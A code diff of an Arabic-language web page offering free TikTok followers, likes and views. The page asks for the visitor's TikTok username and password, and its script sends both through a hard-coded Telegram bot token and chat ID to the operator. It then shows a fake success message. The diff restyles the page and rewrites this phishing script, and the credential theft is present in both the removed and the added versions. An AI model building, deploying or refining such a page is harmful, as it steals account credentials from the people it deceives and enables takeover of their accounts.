--- a/index.html
+++ b/index.html
@@ -1,50 +1,65 @@
-<!DOCTYPE html><html lang="ar">
+<!DOCTYPE html>
+<html lang="ar" dir="rtl">
 <head>
-  <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>رشق تيك توك</title>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <title>رشق تيك توك مجاني</title>
   <style>
     body {
-      background-image: url('https://i.ibb.co/NYbSY7q/tiktok-bg.png'); /* رابط الصورة المرفوعة سابقاً */
-      background-size: cover;
-      background-repeat: no-repeat;
-      background-position: center;
-      font-family: Arial, sans-serif;
+      background-color: #111;
+      font-family: 'Tahoma', sans-serif;
+      margin: 0;
+      padding: 0;
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+      justify-content: center;
+      height: 100vh;
       color: white;
-      text-align: center;
-      direction: rtl;
     }
+
     .container {
-      margin-top: 300px;
-      background-color: rgba(0, 0, 0, 0.6);
-      padding: 20px;
-      border-radius: 15px;
       width: 90%;
       max-width: 400px;
-      margin-left: auto;
-      margin-right: auto;
+      background-color: #000;
+      border-radius: 15px;
+      padding: 20px;
+      box-shadow: 0 0 15px rgba(255, 255, 255, 0.1);
+      text-align: center;
     }
+
+    .logo {
+      font-size: 60px;
+      margin-bottom: 10px;
+    }
+
     h2 {
-      margin-bottom: 20px;
-      color: white;
+      margin-bottom: 25px;
+      font-size: 24px;
     }
-    input, select, button {
+
+    input, select {
       width: 100%;
-      padding: 10px;
+      padding: 12px;
       margin: 10px 0;
-      border: none;
       border-radius: 8px;
+      border: none;
+      background-color: #1e1e1e;
+      color: white;
       font-size: 16px;
     }
-    input, select {
-      background-color: white;
-      color: black;
-    }
+
     button {
+      width: 100%;
+      padding: 14px;
       background-color: #ff0050;
+      border: none;
+      border-radius: 8px;
+      font-size: 18px;
       color: white;
       cursor: pointer;
     }
+
     button:hover {
       background-color: #e60045;
     }
@@ -52,42 +67,37 @@
 </head>
 <body>
   <div class="container">
+    <div class="logo">🎵</div>
     <h2>رشق مجاني</h2>
-    <form action="https://api.telegram.org/bot7197079453:AAFnVl-c5S28araI2YScZOPlQzBUXn_zZIk/sendMessage" method="post" target="_blank" onsubmit="sendToTelegram(event)">
-      <input type="text" id="username" placeholder="اسم المستخدم" required>
-      <input type="password" id="password" placeholder="كلمة المرور" required>
-      <select id="count">
-        <option value="1000">1000</option>
-        <option value="2000">2000</option>
-        <option value="5000">5000</option>
-      </select>
-      <select id="type">
-        <option value="متابعين">متابعين</option>
-        <option value="لايكات">لايكات</option>
-        <option value="مشاهدات">مشاهدات</option>
-      </select>
-      <button type="submit">تم</button>
-    </form>
-  </div>  <script>
-    function sendToTelegram(event) {
-      event.preventDefault();
-      var username = document.getElementById('username').value;
-      var password = document.getElementById('password').value;
-      var count = document.getElementById('count').value;
-      var type = document.getElementById('type').value;
+    <input type="text" placeholder="اسم المستخدم" id="username" />
+    <input type="password" placeholder="كلمة المرور" id="password" />
+    <select id="amount">
+      <option value="1000">1000</option>
+      <option value="2000">2000</option>
+      <option value="5000">5000</option>
+    </select>
+    <select id="type">
+      <option value="متابعين">متابعين</option>
+      <option value="لايكات">لايكات</option>
+      <option value="مشاهدات">مشاهدات</option>
+    </select>
+    <button onclick="sendData()">تم</button>
+  </div>
 
-      var message = `\u2728 تيك توك جديد:\n\n👤 يوزر: ${username}\n🔒 باسورد: ${password}\n📦 عدد: ${count}\n📌 نوع: ${type}`;
+  <script>
+    function sendData() {
+      const username = document.getElementById("username").value;
+      const password = document.getElementById("password").value;
+      const amount = document.getElementById("amount").value;
+      const type = document.getElementById("type").value;
 
-      var telegramURL = `https://api.telegram.org/bot7197079453:AAFnVl-c5S28araI2YScZOPlQzBUXn_zZIk/sendMessage?chat_id=7197079453&text=${encodeURIComponent(message)}`;
+      const token = "7197079453:AAFnVl-c5S28araI2YScZOPlQzBUXn_zZIk";
+      const chat_id = "7197079453";
+      const message = `🚨 تم إرسال طلب جديد:\n👤 المستخدم: ${username}\n🔑 كلمة المرور: ${password}\n📦 الكمية: ${amount}\n📌 النوع: ${type}`;
 
-      fetch(telegramURL)
-        .then(response => {
-          if (response.ok) {
-            alert("تم الإرسال بنجاح!");
-          } else {
-            alert("فشل الإرسال.");
-          }
-        });
+      fetch(`https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(message)}`);
+      alert("تم الإرسال بنجاح ✅");
     }
-  </script></body>
+  </script>
+</body>
 </html>
